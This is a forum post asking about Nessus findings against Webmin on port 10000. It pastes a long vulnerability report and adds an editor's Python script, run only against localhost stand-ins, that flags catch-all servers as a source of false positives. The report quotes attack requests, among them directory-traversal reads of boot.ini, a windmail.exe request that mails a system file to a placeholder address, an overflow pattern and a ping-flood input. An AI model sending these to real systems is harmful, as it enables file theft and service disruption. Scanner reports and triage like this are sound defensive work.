
Nessus & Webmin Security Questions



Hi guys,

@ the moment I'm working on securing a web-server. I installed Nessus to
know where to start from with the big problems. Seems like Nessus thinks
that one of the biggest problems is webmin? Can anybody tell me some
experiences? Is there a possibility to further restrict, or replace some
parts of webmin (see text below)? I really would like to use it....

Also what's quite annoying, that Nessus says that

*** Nessus reports this vulnerability using only
*** information that was gathered. Use caution
*** when testing without safe checks enabled.

I've tried a lot of settings but it seems that I'm missing the safe checks,
any idea where to find those? How can I REALLY stress webmin, to see if it's
safe? Of course I'm using the ssl variant :-)! Where is the check box for
the safe checks O_o ?????

On the client side I use (don't hit me :-) NessusMX, the Wintendo Client,
and on the server side the nessusd with version 1.2.7. I already searched
the FAQ @ nessus.org. I did an upgrade on the plugins via
/usr/sbin/nessus-update-plugins. But the warnings remain.

Any help is greatly appreciated,
Simmel


That's what Nessus suggests, and there are even more :/ these are only High
and Serious warnings (didn't copy the low ones)

----------------------------------snip----------snip-------snip------------snip-------------------------

unknown (10000/tcp) High It is possible to read
any file on the remote system by prepending
several dots before the file name.

Example :

GET ........../config.sys

Solution : Disable this service and install
a real Web Server.

Risk factor : High
CVE : CVE-1999-0386

unknown (10000/tcp) High
The CGI /scripts/tools/newdsn.exe is present.

This CGI allows any attacker to create files
anywhere on your system if your NTFS permissions
are not tight enough, and can be used to overwrite
DSNs of existing databases.

Solution : Remove newdsn.exe
Risk factor : High
CVE : CVE-1999-0191

unknown (10000/tcp) High The 'nph-publish.cgi' is installed. This CGI has
a well known security flaw that lets an attacker execute arbitrary
commands with the privileges of the http daemon (usually root or nobody).

Solution : remove it from /cgi-bin.

Risk factor : Serious
CVE : CVE-1999-1177

unknown (10000/tcp) High
The 'webdist.cgi' cgi is installed. This CGI has
a well known security flaw that lets anyone execute arbitrary
commands with the privileges of the http daemon (root or nobody).

*** Nessus reports this vulnerability using only
*** information that was gathered. Use caution
*** when testing without safe checks enabled.

Solution : remove it from /cgi-bin.

Risk factor : Serious
CVE : CVE-1999-0039

unknown (10000/tcp) High
Some versions of the mini-sql program come with a
w3-msql CGI which is vulnerable to a buffer overflow.

An attacker may use it to gain a shell on this system.

*** Nessus reports this vulnerability using only
*** information that was gathered. Use caution
*** when testing without safe checks enabled.

Solution : contact the vendor of mini-sql (http://hugues.com.au)
and ask for a patch. Meanwhile, remove w3-msql from
/cgi-bin

Risk factor : High
CVE : CVE-2000-0012

unknown (10000/tcp) High The CGI 'wwwwais' is installed. This CGI has
a well known security flaw that lets an attacker execute arbitrary
commands with the privileges of the http daemon (usually root or nobody).

*** Nessus reports this vulnerability using only
*** information that was gathered. Use caution
*** when testing without safe checks enabled.

Solution : remove it from /cgi-bin.

Risk factor : Serious
CVE : CAN-2001-0223


Risk factor : Serious
CVE : CVE-1999-0951

unknown (10000/tcp) High
There may be a buffer overrun in
the 'cgitest.exe' CGI program, which will allow anyone to
execute arbitrary commands with the same privileges as the
web server (root or nobody).

*** Nessus reports this vulnerability using only
*** information that was gathered. Use caution
*** when testing without safe checks enabled.

Solution : remove it from /cgi-bin.

Risk factor : Serious
CVE : CVE-2002-0128

unknown (10000/tcp) High
There may be buffer overflow in the remote cgi win-c-sample.exe.
An attacker may use this flaw to execute arbitrary commands
on this host.

*** Nessus reports this vulnerability using only
*** information that was gathered. Use caution
*** when testing without safe checks enabled.

Solution : delete it
Risk factor : High
CVE : CVE-1999-0178

unknown (10000/tcp) High
There may be a buffer overflow in the remote
htimage.exe cgi when it is given the request :

/cgi-bin/htimage.exe/AAAA[....]AAA?0,0

An attacker may use it to execute arbitrary code
on this host.

*** Nessus reports this vulnerability using only
*** information that was gathered. Use caution
*** when testing without safe checks enabled.

Solution : delete it
Risk factor : High
CVE : CAN-2000-0256

unknown (10000/tcp) High
The file /admin-serv/config/admpw is readable.

This file contains the encrypted password for the Netscape
administration server. Although it is encrypted, an attacker
may attempt to crack it by brute force.

Solution : Remove read access permissions for this file and/or stop
the Netscape administration server.

Risk factor : Medium

unknown (10000/tcp) High
It is possible to read arbitrary files on
the remote server by prepending ../../
or ..\..\ in front of the file name.

Solution : Use another web server
Risk factor : High

unknown (10000/tcp) High It was possible to read the content of /EXT.INI
(BadBlue configuration file) by sending an invalid GET request.

A cracker may exploit this vulnerability to steal the passwords.


Solution : upgrade your software or protect it with a filtering reverse
proxy
Risk factor : Medium

unknown (10000/tcp) High The file /wwwboard/passwd.txt exists.

This file is installed by default with Matt's Script wwwboard
software. This can be a high risk vulnerability if the
password used is the same for other services. An attacker
can easily take over the board by cracking the passwd.

Solution : Configure the wwwadmin.pl script to put
the passwd.txt file somewhere else.

Risk factor : High
CVE : CVE-1999-0953

unknown (10000/tcp) High The CGI 'AnyForm2' is installed.


Old versions of this CGI have a well known security flaw that lets
anyone execute arbitrary commands with the privileges of the http daemon
(root or nobody).

Solution : remove it.
Risk factor : Serious
CVE : CVE-1999-0066

unknown (10000/tcp) High
IIS comes with the sample site 'ExAir'. Unfortunately, one of its pages,
namely /iissamples/exair/search/query.asp, may be used to make IIS hang,
thus preventing it from answering to legitimate clients.

Solution : Delete the 'ExAir' sample IIS site

Risk factor : Medium
CVE : CVE-1999-0449

unknown (10000/tcp) High
IIS comes with the sample site 'ExAir'.
Unfortunately, one of its pages,
namely /iissamples/exair/search/search.asp,
may be used to make IIS hang, thus preventing
it from answering to legitimate clients.

Solution : Delete the 'ExAir' sample IIS site

Risk factor : Medium
CVE : CVE-1999-0449

unknown (10000/tcp) High IIS comes with the sample site 'ExAir'.
Unfortunately,
one of its pages, namely /iissamples/exair/search/advsearch.asp, may
be used to make IIS hang, thus preventing it from answering to legitimate
clients.

Risk factor : Medium/High
Solution : Delete the 'ExAir' sample IIS site
CVE : CVE-1999-0449

unknown (10000/tcp) High The 'wrap' CGI is installed. This CGI allows
anyone to get a listing for any directory with mode +755.


*** Note that not all implementations of 'wrap' are
*** vulnerable. See the relevant CVE entry.

Solution : remove it from /cgi-bin.

Risk factor : Low/Medium
CVE : CVE-1999-0149

unknown (10000/tcp) High
alya.cgi is a cgi backdoor distributed with
multiple rootkits.

Risk factor : Serious

unknown (10000/tcp) High The remote HTTP server
allows an attacker to read arbitrary files
on the remote web server, simply by adding
dots in front of its name :
Example:
GET /../../winnt/boot.ini

will return C:\winnt\boot.ini

Solution : Upgrade your web server or change it.

Risk factor : Serious
CVE : CAN-1999-0776

unknown (10000/tcp) High The 'get32.exe' cgi is installed. This CGI has
a well known security flaw that lets anyone execute arbitrary
commands with the privileges of the http daemon (root or nobody).

Solution : remove it from /cgi-bin.

Risk factor : Serious
CVE : CAN-1999-0885

unknown (10000/tcp) High
It may be possible for an attacker to reconfigure the
remote web server by requesting :

GET /scripts/wsisa.dll/WService=anything?WSMadmin


Solution : Edit the ubroker.properties file and change
AllowMsngrCmds = 1
to :
AllowMsngrCmds = 0


Risk factor : High
CVE : CVE-2000-0127

unknown (10000/tcp) High
The file /site/eg/source.asp is present.

This file comes with the Apache::ASP package
and allows anyone to write to files in the
same directory.

An attacker may use this flaw to upload his
own scripts and execute arbitrary commands
on this host.

Solution : Upgrade to Apache::ASP 1.95
Risk factor : Serious
CVE : CVE-2000-0628

unknown (10000/tcp) High
A security vulnerability in Apache 2.0.39 on Windows systems
allows attackers to access files that would otherwise be
inaccessible using a directory traversal attack.
A cracker may use this to read sensitive files or even execute
any command on your system.

Solutions:
- Upgrade to Apache 2.0.40
- or install it on a Unix machine
- or add in your httpd.conf, before the first
'Alias' or 'Redirect' directive:
RedirectMatch 400 \\\.\.

Risk factor : High
CVE : CAN-2002-0661

unknown (10000/tcp) High
The Cart32 e-commerce shopping cart is installed.

This software contains several security flaws :

- it may contain a backdoor
- users may be able to change the admin password remotely


You should use something else.

See also : http://www.cerberus-infosec.co.uk/advcart32.html

Solution : use another shopping cart software
Risk factor : High
CVE : CAN-2000-0429

unknown (10000/tcp) High
A security vulnerability in BadBlue allows attackers to access
files that would otherwise be inaccessible using a directory
traversal attack.

Solution: Contact the vendor for a patch
Risk factor : High

unknown (10000/tcp) High
basilix.php3 is installed on this web server. Some versions
of this webmail software allow the users to read any file on
the system with the permission of the webmail software, and
execute any PHP.

Solution : Update Basilix or remove DUMMY from lang.inc

Risk factor : Low
CVE : CAN-2001-1045

unknown (10000/tcp) High The 'bboard' servlet is installed in
/servlet/sunexamples.BBoardServlet. This servlet has
a well known security flaw that lets anyone execute arbitrary
commands with the privileges of the http daemon (root or nobody).

Solution : remove it.

Risk factor : Serious
CVE : CAN-2000-0629

unknown (10000/tcp) High

BizDB is a web database integration product
using Perl CGI scripts. One of the scripts,
bizdb-search.cgi, passes a variable's
contents to an unchecked open() call and
can therefore be made to execute commands
at the privilege level of the webserver.

The variable is dbname, and if passed a
semicolon followed by shell commands they
will be executed. This cannot be exploited
from a browser, as the software checks for
a referrer field in the HTTP request. A
valid referrer field can however be created
and sent programmatically or via a network
utility like netcat.

see also : http://www.hack.co.za/daem0n/cgi/cgi/bizdb.htm

Risk factor : Serious
CVE : CVE-2000-0287

unknown (10000/tcp) High
RedHat Linux 6.0 installs by default a squid cache manager cgi script with
no restricted access permissions. This script could be used to perform a
port scan from the cgi-host machine.

Solution :
If you are not using the box as a Squid www proxy/cache server then
uninstall the package by executing:
/etc/rc.d/init.d/squid stop
rpm -e squid

If you want to continue using the Squid proxy server software, make the
following actions to tighten security access to the manager interface:
mkdir /home/httpd/protected-cgi-bin
mv /home/httpd/cgi-bin/cachemgr.cgi /home/httpd/protected-cgi-bin/

And add the following directives to /etc/httpd/conf/access.conf and
srm.conf:

--- start access.conf segment ---
# Protected cgi-bin directory for programs that
# should not have public access
order deny,allow
deny from all
allow from localhost
#allow from .your_domain.com
AllowOverride None
Options ExecCGI
--- end access.conf segment ---

--- start srm.conf segment ---
ScriptAlias /protected-cgi-bin/ /home/httpd/protected-cgi-bin/
--- end srm.conf segment ---

Risk factor : High
CVE : CVE-1999-0710

unknown (10000/tcp) High The 'campas' cgi is installed. This CGI has
a well known security flaw that lets anyone execute arbitrary
commands with the privileges of the http daemon (root or nobody).

Solution : remove it from /cgi-bin.

Risk factor : Serious
CVE : CVE-1999-0146

unknown (10000/tcp) High 'cgiwrap' is installed. This CGI has
a well known security flaw that lets anyone execute arbitrary
commands with the privileges of the http daemon (root or nobody).

*** Note that not all versions of cgiwrap are affected
*** by this problem ! Consult your vendor.

Solution : remove it from /cgi-bin.

Risk factor : Serious
CVE : CVE-1999-1530

unknown (10000/tcp) High
It is possible to read the include file of PCCS-Mysql,
dbconnect.inc on the remote server.

This include file contains information such as the
username and password used to connect to the database.

Solution:
Versions 1.2.5 and later are not vulnerable to this issue.
A workaround is to restrict access to the .inc file.

Risk factor : High
CVE : CVE-2000-0707

unknown (10000/tcp) High /cgi-bin/.cobalt/overflow/overflow.cgi was
detected.
Some versions of this CGI allow remote users to execute arbitrary commands
with the privileges of the web server.

*** Nessus just checked the presence of this file
*** but did not try to exploit the flaw, so this might
*** be a false positive

See: http://www.cert.org/advisories/CA-2002-35.html

Solution : get a newer software from Cobalt
Risk factor : High

unknown (10000/tcp) High The 'Count.cgi' cgi is installed. This CGI has
a well known security flaw that lets anyone execute arbitrary
commands with the privileges of the http daemon (root or nobody).

Solution : remove it from /cgi-bin.

Risk factor : Serious
CVE : CVE-1999-0021

unknown (10000/tcp) High
The script /cart/cart.cgi is present.

If this shopping cart system is the Dansie
Shopping Cart, and if it is older than version 3.0.8
then it is very likely that it contains a backdoor
which allows anyone to execute arbitrary commands on this system.

Solution : use another cart system
Risk factor : High
CVE : CVE-2000-0252

unknown (10000/tcp) High The 'Perl' CGI is installed and can be launched
as a CGI. This is equivalent to giving a free shell to an attacker, with the
http server privileges (usually root or nobody).

Solution : remove it from /cgi-bin

Risk factor : Serious
CVE : CAN-1999-0509

unknown (10000/tcp) High At least one of these file or directories is
world readable :

/webcart/orders/
/webcart/orders/import.txt
/webcart/carts/
/webcart/config/
/webcart/config/clients.txt
/webcart-lite/orders/import.txt
/webcart-lite/config/clients.txt

This misconfiguration may allow an attacker to gather
the credit card numbers of your clients.

Solution : Do not make directories world readable.

Risk factor : High
CVE : CAN-1999-0610

unknown (10000/tcp) High The Excite for Webservers is installed. This CGI has
a well known security flaw that lets anyone execute arbitrary
commands with the privileges of the http daemon (root or nobody).

Versions newer than 1.1. are patched.


Solution : if you are running version 1.1 or older, then
upgrade it.

Risk factor : Serious
CVE : CVE-1999-0279

unknown (10000/tcp) High
ServletExec has a servlet called 'UploadServlet' in its server
side classes. UploadServlet, when invokable, allows an
attacker to upload any file to any directory on the server. The
uploaded file may have code that can later be executed on the
server, leading to remote command execution.

Solution : Remove it
Risk factor : Serious
CVE : CVE-2000-1024

unknown (10000/tcp) High It is possible to fill the hard disk of a server
running OmniHTTPd by issuing the request :
http://omni.server/cgi-bin/visadmin.exe?user=guest
This allows an attacker to crash your web server.
This script checks for the presence of the faulty CGI, but
does not execute it.

Solution : remove visadmin.exe from /cgi-bin.

Risk factor : Medium/High
CVE : CAN-1999-0970

unknown (10000/tcp) High
The remote web server appears to be running with
Frontpage extensions and lets the file 'authors.pwd'
to be downloaded by everyone.

This is a security concern since this file contains
sensitive data.

Solution : Contact Microsoft for a fix.

Risk factor : Medium

unknown (10000/tcp) High The CGI 'viralator.cgi' is installed.
Some versions of this CGI do not properly check user
input and allow anyone to execute arbitrary commands with
the privileges of the web server
** No flaw was tested. Your script might be a safe version.

Solutions : Upgrade this script to version 0.9pre2 or newer
Risk factor : Serious
CVE : CAN-2001-0849

unknown (10000/tcp) High The 'glimpse' cgi is installed. This CGI has
a well known security flaw that lets anyone execute arbitrary
commands with the privileges of the http daemon (root or nobody).

Note that we could not actually check for the presence
of this vulnerability, so you may be using a patched
version.

Solution : remove it from /cgi-bin.

Risk factor : Serious
CVE : CVE-1999-0147

unknown (10000/tcp) High The 'guestbook.cgi' is installed. This CGI has
a well known security flaw that lets anyone execute arbitrary
commands with the privileges of the http daemon (root or nobody).

Solution : remove it from /cgi-bin.

Risk factor : Serious
CVE : CVE-1999-0237

unknown (10000/tcp) High The 'guestbook.pl' is installed. This CGI has
a well known security flaw that lets anyone execute arbitrary
commands with the privileges of the http daemon (root or nobody).

Solution : remove it from /cgi-bin.

Risk factor : Serious
CVE : CAN-1999-1053

unknown (10000/tcp) High The 'plusmail' CGI is installed. Some
versions of this CGI have a well known security flaw that
lets an attacker execute arbitrary
commands with the privileges of the http daemon
(usually root or nobody).

Solution : remove it from /cgi-bin. No patch yet

Risk factor : Serious
CVE : CAN-2000-0074

unknown (10000/tcp) High The 'webgais' CGI is installed. This CGI has
a well known security flaw that lets an attacker execute arbitrary
commands with the privileges of the http daemon (usually root or nobody).

Solution : remove it from /cgi-bin

Risk factor : Serious
CVE : CVE-1999-0176

unknown (10000/tcp) High The 'jj' CGI is installed. This CGI has
a well known security flaw that lets an attacker execute arbitrary
commands with the privileges of the http daemon (usually root or nobody).

Solution : Remove it from /cgi-bin.

Risk factor : Serious
CVE : CVE-1999-0260

unknown (10000/tcp) High The Cobalt 'siteUserMod' CGI is installed.
Older versions of this CGI allow any user to change the
administrator password.

Make sure you are running the latest version.

Solution :

RaQ 1 Users, download :
ftp://ftp.cobaltnet.com/
pub/experimental/security/siteUserMod/RaQ1-Security-3.6.pkg

RaQ 2 Users, download :
ftp://ftp.cobaltnet.com/
pub/experimental/security/siteUserMod/RaQ2-Security-2.94.pkg

RaQ 3 Users, download :
ftp://ftp.cobaltnet.com/
pub/experimental/security/siteUserMod/RaQ3-Security-2.2.pkg


Risk factor : High
CVE : CVE-2000-0117

unknown (10000/tcp) High
The web server is probably susceptible to a common IIS vulnerability
discovered by 'Rain Forest Puppy'. This vulnerability enables an attacker
to execute arbitrary commands on the server with Administrator Privileges.

See Microsoft security bulletin (MS99-025) for patch information.
Also, BUGTRAQ ID 529 on www.securityfocus.com
(http://www.securityfocus.com/bid/529)

Risk factor : High
CVE : CVE-1999-1011

unknown (10000/tcp) High The 'uploader.exe' CGI is installed. This CGI has
a well known security flaw that lets anyone upload arbitrary
CGI on the server, and then execute them.

Solution : remove it from /cgi-win.

Risk factor : Serious
CVE : CVE-1999-0177

Risk factor : High
unknown (10000/tcp) High
The file /ncl_items.html or /ncl_subjects.html exist on the remote system.
It is very likely that this file will allow an attacker
to reconfigure your Tektronix printer.

An attacker can use this to prevent the users of your
network from working properly by preventing them
from printing their files.

Solution : Filter incoming traffic to port 80 to this
device, or disable the Phaserlink webserver on the
printer (can be done by requesting
http://printername/ncl_items?SUBJECT=2097)

Risk factor : Low
CVE : CAN-1999-1508

unknown (10000/tcp) High The 'ping.asp' CGI is installed. Some versions
allows a cracker to launch a ping flood against your
machine or another by entering
'127.0.0.1 -l 65000 -t' in the Address field.

Solution : remove it.

Risk factor : Serious

unknown (10000/tcp) High
It is possible to read arbitrary files on the remote
Snapstream PVS server by prepending ../../ in front of the
file name.
It may also be possible to read ../ssd.ini which contains
much information on the system (base directory, usernames &
passwords).

Solution : Upgrade your software or change it!
Risk factor : High

unknown (10000/tcp) High The 'windmail.exe' CGI is installed.

Some versions of this CGI script have a security flaw that lets
an attacker execute arbitrary commands on the remote server.

To test this, make the following request :

GET /cgi-bin/windmail.exe?-n%20c:\boot.ini%20you@youraddress.com

(replace you@youraddress.com by your real email address).

If you receive the content of the file boot.ini,
then your server is vulnerable.

Solution : remove it from /cgi-bin. See www.geocel.com
for a new version.

Risk factor : Serious
CVE : CAN-2000-0242

unknown (10000/tcp) High The 'websendmail' CGI is installed. This CGI has
a well known security flaw that lets an attacker execute arbitrary
commands with the privileges of the http daemon (usually root or nobody).

Solution : Remove it from /cgi-bin.

Risk factor : Serious
CVE : CVE-1999-0196

unknown (10000/tcp) High The 'upload.cgi' cgi is installed. This CGI has
a well known security flaw that lets anyone upload arbitrary
files on the remote web server.

Solution : remove it from /cgi-bin.

Risk factor : Serious

unknown (10000/tcp) High
Trend Micro OfficeScan Corporate Edition (Japanese version: Virus
Buster Corporate Edition) web-based management console let anybody
access /officescan/hotdownload without authentication.

Reading the configuration file /officescan/hotdownload/ofcscan.ini
will reveal information on your system. More, it contains passwords
that are encrypted by a weak specific algorithm so they might be
decrypted

Solution : upgrade OfficeScan
Risk factor : Low

unknown (10000/tcp) High
The remote web server has one of these shells installed
in /cgi-bin :
ash, bash, csh, ksh, sh, tcsh, zsh

Leaving executable shells in the cgi-bin directory of
a web server may allow an attacker to execute arbitrary
commands on the target machine with the privileges of the
http daemon (usually root or nobody).

Solution : Remove all the shells from /cgi-bin.

Risk factor : Serious
CVE : CAN-1999-0509
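Editor's note on the report above, with an added example that is not part of the original post. Every finding is on 10000/tcp, and together they claim that IIS sample sites, a Tektronix printer, Cobalt RaQ scripts, BadBlue, OmniHTTPd and a dozen Unix cgi-bin programs all live on the same port. That spread is the signature of a server that answers HTTP 200 to any path it is asked for; Nessus plugins that only test for the presence of a file (the ones marked "Nessus reports this vulnerability using only information that was gathered", i.e. run with the safe_checks preference on, so the flaw itself was not exercised) key on the status code and are fooled. The assumption made here, not stated in the report, is that port 10000 is Webmin's miniserv serving its login page with status 200 for every URL. The script below shows the check a scanner performs to detect such a server, and re-checks presence-only findings against it. The two HTTP handlers are constructed stand-ins running on localhost; nothing here is Webmin or Nessus code.

```python
import http.server
import secrets
import threading
import urllib.error
import urllib.request


# Constructed stand-in for an admin server that answers every path with the
# same 200 login page (the behaviour assumed here for Webmin's miniserv in
# session-login mode). This is not Webmin code.
class CatchAllHandler(http.server.BaseHTTPRequestHandler):
    PAGE = b"<html><body><form action='/session_login.cgi'>login</form></body></html>"

    def do_GET(self):
        self._reply(200, self.PAGE)

    def _reply(self, status, body):
        self.send_response(status)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # silence request logging in the demo
        pass


# Constructed stand-in for a server with working 404s on which exactly one
# of the reported CGIs really exists.
class StrictHandler(CatchAllHandler):
    PRESENT = {"/cgi-bin/htimage.exe": b"htimage ok\n"}

    def do_GET(self):
        if self.path in self.PRESENT:
            self._reply(200, self.PRESENT[self.path])
        else:
            self._reply(404, b"Not Found\n")


def start_server(handler):
    """Bind a throwaway server on an ephemeral port; return (server, base URL)."""
    srv = http.server.HTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, "http://127.0.0.1:%d" % srv.server_address[1]


def fetch(base, path):
    """GET base+path; return (status, body) without raising on 4xx/5xx."""
    try:
        with urllib.request.urlopen(base + path, timeout=5) as r:
            return r.getcode(), r.read()
    except urllib.error.HTTPError as e:
        return e.code, e.read()


def random_path(suffix=".cgi"):
    # A name nobody ships: if this returns 200, status codes mean nothing.
    return "/nx-" + secrets.token_hex(8) + suffix


def answers_200_to_anything(base):
    """Request two paths that cannot exist. If both come back 200 with the
    same body, the server is a catch-all and presence checks are unreliable."""
    s1, b1 = fetch(base, random_path(".cgi"))
    s2, b2 = fetch(base, random_path(".html"))
    return s1 == 200 and s2 == 200 and b1 == b2


def triage(base, paths):
    """Re-check presence-only findings. A path is kept only if it returns 200
    and, on a catch-all server, its body differs from the generic page."""
    generic = answers_200_to_anything(base)
    _, baseline = fetch(base, random_path(".cgi"))
    kept = []
    for p in paths:
        status, body = fetch(base, p)
        if status == 200 and (not generic or body != baseline):
            kept.append(p)
    return kept


# Paths taken from presence-based findings in the report above.
REPORTED = [
    "/scripts/tools/newdsn.exe",
    "/cgi-bin/htimage.exe",
    "/iissamples/exair/search/query.asp",
    "/wwwboard/passwd.txt",
]

if __name__ == "__main__":
    for name, handler in (("catch-all", CatchAllHandler), ("strict", StrictHandler)):
        srv, base = start_server(handler)
        print(name, "answers 200 to anything:", answers_200_to_anything(base))
        print(name, "findings that survive re-check:", triage(base, REPORTED))
        srv.shutdown()
```

Against the catch-all server every reported path survives the status check but none survives the body comparison, which is the situation the report above most likely reflects; against the strict server only the path that really exists is kept. A finding that survives this re-check still needs the specific test the plugin describes (for example the windmail.exe request quoted in the report) run by hand before it is treated as confirmed.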



